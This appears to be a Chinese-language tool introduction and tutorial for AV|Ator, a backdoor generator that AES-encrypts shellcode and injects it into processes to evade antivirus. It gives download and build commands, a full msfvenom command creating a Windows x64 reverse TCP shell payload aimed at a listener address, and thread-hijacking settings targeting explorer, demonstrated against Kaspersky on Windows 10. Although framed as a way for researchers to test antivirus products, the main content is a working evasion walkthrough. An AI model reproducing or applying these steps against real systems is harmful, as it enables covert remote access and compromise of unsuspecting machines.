AV|Ator是一款功能强大的AV检测绕过工具,从本质上来说,该工具是一个后门生成实用工具,该工具使用了加密技术和注入技术来尝试绕过反病毒产品的检测。因此,广大研究人员可以使用该工具来测试目标反病毒产品的安全检测能力。
1、该工具使用了AES加密算法来对给定的Shellcode进行加密处理;
2、该工具可以生成一个包含了加密Payload的可执行文件;
3、最终的Shellcode可以使用各种不同的注入技术在目标操作系统中执行注入和解密;
广大研究人员可以直接点击此链接下载预编译的项目可执行文件:https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
除此之外,我们也可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/Ch0pin/AVIator.git
并使用C#开发环境来对项目代码进行本地编译。
首先,我们需要根据Linux操作系统发行版版本来安装Mono,然后下载并运行项目代码即可。
下面以Kali为例:
git clone https://github.com/Ch0pin/AVIator.git
cd AVIator
root@kali# apt install mono-devel
root@kali# mono aviator.exe
该工具提供了一个表单,其中包含三个主要的输入参数:
1、加密密钥,用于对Shellcode进行加密;
2、IV向量,用于AES加密;
3、Shellcode;
在下面的工具使用演示样例中,我们将尝试在一台Windows 10 x64主机上绕过最新版本的卡巴斯基反病毒产品。
首先,我们使用msfvenom来创建Payload:
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
(向右滑动,查看更多)
接下来,对AV|Ator执行下列操作:
目标操作系统架构:x64;
注入技术:线程劫持(Shellcode Arch:x64,OS Arch:x64);;
目标程序:explorer(默认);
然后在我们的设备上设置好监听器,然后在目标设备上运行生成的可执行文件即可。
本项目的开发与发布遵循GPL-3.0开源许可证协议。
AV|Ator:
https://github.com/Ch0pin/AVIator
https://en.wikipedia.org/wiki/Ator
https://attack.mitre.org/techniques/T1055/